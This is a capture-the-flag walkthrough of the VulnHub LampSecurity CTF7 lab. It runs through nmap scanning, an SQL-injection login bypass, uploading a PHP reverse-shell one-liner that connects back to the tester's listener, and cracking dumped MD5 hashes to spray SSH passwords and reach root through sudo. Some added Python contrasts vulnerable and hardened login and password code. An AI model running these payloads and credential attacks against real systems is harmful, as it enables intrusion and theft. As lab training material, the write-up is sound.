LAMPSECURITY: CTF7
https://www.vulnhub.com/entry/lampsecurity-ctf7,86/
Host discovery
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:24 CST
MAC Address: 00:50:56:E1:33:13 (VMware)
Nmap scan report for 192.168.54.136
Host is up (0.00027s latency).
Port scan
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap --min-rate 10000 -p- 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:24 CST
Nmap scan report for 192.168.54.136
Host is up (0.0014s latency).
Not shown: 65507 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
TCP service scan
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:26 CST
Nmap scan report for 192.168.54.136
Host is up (0.0016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds
UDP scan
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap -sU -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:27 CST
Nmap scan report for 192.168.54.136
Host is up (0.00031s latency).
PORT STATE SERVICE
22/udp filtered ssh
80/udp filtered http
137/udp filtered netbios-ns
138/udp filtered netbios-dgm
139/udp filtered netbios-ssn
901/udp filtered smpnameres
5900/udp filtered rfb
8080/udp filtered http-alt
10000/udp filtered ndmp
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
Script scan of the open ports
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.54.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 09:28 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.136
Host is up (0.00041s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /webmail/: Mail folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|_ /webalizer/: Potentially interesting folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-fileupload-exploiter:
| Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /login.php: Possible admin folder
| /phpmyadmin/: phpMyAdmin
| /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 115.57 seconds
A login page is found on port 8080.
Tried the "universal password" (the SQL-injection login bypass); it worked.
Editing the PHP code here and submitting it reveals the file path.
So let's try uploading a file. First write the reverse shell into a file, then upload it. Finally browse to it (don't forget to start the listener first: nc -lvnp 443).
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>
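For the login bypass described above, here is an added Python model (not the CTF7 application's code) of why a "universal password" works against a concatenated query and how a parameterized query stops it; the in-memory sqlite table, brian's row and the function names are constructed for this demo.

```python
import hashlib
import sqlite3

# Constructed stand-in for the site's users table (column names taken from the dump
# later in the writeup; the single row is built here, not copied from the box).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO users VALUES (?, ?, 1)",
               ("brian@localhost.localdomain", hashlib.md5(b"my2cents").hexdigest()))
    return db

def login_vulnerable(db, username, password):
    """Query built by string concatenation: user input becomes SQL syntax.
    Returns the matched username or None."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()  # unsalted MD5, as on this box
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + pw_hash + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, username, password):
    """Same check with bound parameters: the driver never treats input as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, pw_hash)).fetchone()
    return row[0] if row else None

# The textbook tautology in the username field; the SQL comment discards the password test.
BYPASS = "x' OR '1'='1' -- "

def demo():
    """Runs both implementations against the bypass string and a real credential."""
    db = make_db()
    return {
        "vuln_bypass": login_vulnerable(db, BYPASS, "anything"),  # returns brian: bypassed
        "hard_bypass": login_hardened(db, BYPASS, "anything"),    # returns None: rejected
        "hard_valid": login_hardened(db, "brian@localhost.localdomain", "my2cents"),
    }
```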
Got a shell
# yunki @ yunki in ~/vulnhub/ctf7 [9:42:02]
$ sudo nc -lvnp 443
[sudo] yunki 的密码:
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.136] 53367
bash: no job control in this shell
bash-4.1$
Privilege escalation
bash-4.1$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:
We don't know the password, which is a problem. Let's see which users exist. Nothing useful found. Let's look in the web root instead.
cd /var/www/html
bash-4.1$ ls -liah
ls -liah
total 3.7M
260010 drwxrwxr-x. 10 webdev webdev 4.0K Dec 24 2012 .
259983 drwxr-xr-x. 7 root root 4.0K Dec 19 2012 ..
260462 -rw-rw-r--. 1 webdev webdev 130 Dec 19 2012 .htaccess
260415 drwxrwxr-x. 2 apache webdev 4.0K Feb 26 03:25 assets
3302 drwxr-xr-x. 2 root root 4.0K Dec 24 2012 backups
260235 -rw-rw-r--. 1 webdev webdev 83K Dec 8 2012 bootstrap.zip
260392 drwxr-xr-x. 2 webdev webdev 4.0K Dec 8 2012 css
260420 -rw-rw-r--. 1 webdev webdev 189 Jul 26 2012 favicon.ico
260405 drwxr-xr-x. 2 webdev webdev 4.0K Dec 8 2012 img
260411 drwxrwxr-x. 2 webdev webdev 4.0K Dec 19 2012 inc
260352 -rw-rw-r--. 1 webdev webdev 568 Dec 24 2012 index.php
260408 drwxr-xr-x. 2 webdev webdev 4.0K Dec 11 2012 js
270634 -rw-r--r--. 1 webdev webdev 3.6M Nov 14 2012 roundcubemail-0.8.4.tar.gz
134349 drwxrwxr-x. 2 john john 4.0K Dec 19 2012 webalizer
259680 drwxr-xr-x. 11 webdev webdev 4.0K Dec 19 2012 webmail
Reading the source, there is a db.php in inc that contains the MySQL username and password.
Let's try MySQL.
bash-4.1$ mysql -uroot -p
mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 107
Server version: 5.1.66 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| roundcube |
| website |
+--------------------+
4 rows in set (0.00 sec)
mysql> use website;
use website;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact |
| documents |
| hits |
| log |
| newsletter |
| payment |
| trainings |
| trainings_x_users |
| users |
+-------------------+
9 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username | password | is_admin | last_login | user_id | realname | profile |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 | 1 | 2012-12-19 11:30:54 | 3 | Brian Hershel | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 | 1 | NULL | 4 | John Durham | |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 | 1 | NULL | 5 | Alice Wonder | |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 | 1 | NULL | 6 | Ruby Spinster | |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a | 1 | NULL | 7 | Leon Parnetta | |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 | 1 | NULL | 8 | Julia Fields | |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 | 0 | NULL | 9 | Michael Saint | |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | 0 | NULL | 10 | Bruce Pottricks | |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 | 0 | NULL | 11 | Neil Felstein | |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf | 0 | NULL | 12 | Charles Adams | |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a | 0 | NULL | 36 | | |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 | 0 | NULL | 113 | | |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)
The output is a bit noisy, so let's clean it up first.
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
# saved into a.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat a.txt | awk -F ' ' '{print $2}' | awk -F '@' '{print$1}' > usernames.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat usernames.txt
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat a.txt | awk -F ' ' '{print $4}' > hashes.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat hashes.txt
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
Let's crack them with hashcat.
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
# saved into passwordRaw.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat passwordRaw.txt
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat passwordRaw.txt | awk -F ':' '{print $2}' > password.txt
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# cat password.txt
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
Password brute-force over SSH
┌──(root💀yunki)-[/home/yunki/vulnhub/ctf7]
└─# crackmapexec ssh 192.168.54.136 -u usernames.txt -p password.txt --continue-on-success
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
SSH 192.168.54.136 22 192.168.54.136 [*] SSH-2.0-OpenSSH_5.3
SSH 192.168.54.136 22 192.168.54.136 [-] brian:madrid Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:changeme Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:qwer1234 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:test Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:chuck33 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:turtles77 Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [-] brian:somepassword Authentication failed.
SSH 192.168.54.136 22 192.168.54.136 [+] brian:my2cents
... (remaining attempts skipped)
Get a shell
# yunki @ yunki in ~/vulnhub/ctf7 [10:37:05]
$ ssh brian@192.168.54.136
The authenticity of host '192.168.54.136 (192.168.54.136)' can't be established.
RSA key fingerprint is SHA256:GfrI8RJ0/Xy8Za7qDP9Gm+RaoxuVz1GWo15hvn8+rdI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.136' (RSA) to the list of known hosts.
brian@192.168.54.136's password:
[brian@localhost ~]$
Privilege escalation
[brian@localhost ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for brian:
Matching Defaults entries for brian on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2
QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME
LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brian may run the following commands on this host:
(ALL) ALL
[brian@localhost ~]$ sudo /bin/bash
[root@localhost brian]# whoami
root
Other findings
In the backups directory under the web root I found a buckup.sql containing sensitive information like this:
'brian@localhost.localdomain','d41d8cd98f00b204e9800998ecf8427e'
There are entries for other users too. Let's try this user first, since we just used it to log in over SSH. Speechless: after running it through hashcat it turns out to be an empty password. Oh well, not useful.
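As an added illustration (not from the original writeup) of why the hashcat step and the backup.sql finding above were so easy: the site stores unsalted MD5, which this Python checks against the page's digests for "test" and for the empty string, beside a salted PBKDF2 scheme that also refuses empty passwords; the function names and storage format are this example's own.

```python
import hashlib
import hmac
import os
import re

# Legacy md5() output is 32 lowercase hex chars with no algorithm tag and no salt.
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

def looks_like_raw_md5(value):
    """Cheap audit check for a password column: does it hold bare MD5 digests?"""
    return bool(MD5_RE.match(value))

def is_unsalted_md5_of(digest, plaintext):
    """True if digest == md5(plaintext). With no salt, every user who picked the same
    password shares one digest, and a wordlist hashed once matches the whole table,
    which is what hashcat -m 0 exploited above."""
    computed = hashlib.md5(plaintext.encode()).hexdigest()
    return hmac.compare_digest(computed, digest)

# Hardened storage: per-user random salt, slow KDF, self-describing record
# "salt_hex$iterations$dk_hex" so the cost can be raised later without a schema change.
ITERATIONS = 600_000

def hash_password(password, salt=None):
    """Returns a PBKDF2-HMAC-SHA256 record; rejects the empty password that backup.sql held."""
    if not password:
        raise ValueError("empty passwords are not allowed")
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${ITERATIONS}${dk.hex()}"

def verify_password(stored, password):
    """Recomputes the KDF with the stored salt and compares in constant time."""
    salt_hex, iters, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```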